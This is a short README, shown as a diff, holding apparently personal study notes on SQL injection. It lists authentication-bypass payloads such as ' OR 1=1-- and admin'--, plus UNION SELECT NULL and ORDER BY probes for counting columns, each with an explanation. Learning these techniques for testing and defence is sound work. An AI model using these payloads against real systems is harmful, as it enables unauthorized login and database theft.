soh4n-t/SQL-Query-Notes/README.md

 ## SQLI-Query-Notes
 ### Authentication Bypass
 ```
 ● ' OR 1=1--            : closes the current string ('), injects an always-true condition (OR 1=1), and comments out the remaining query (--)
 ● admin'--              : uses admin as the username, closes the current string ('), and comments out the rest of the query (--)
 ```
 ### UNION-Based SQLI
 ```
-●
+● ' UNION SELECT NULL-- : used to determine the number of columns in an original sql query.
+Increment the number of NULL values until it shows an error, then the previous NULL count will be the column number
+● ' ORDER BY 1--        : same function as the previous (' UNION SELECT NULL--), here increment the numeric value
 ```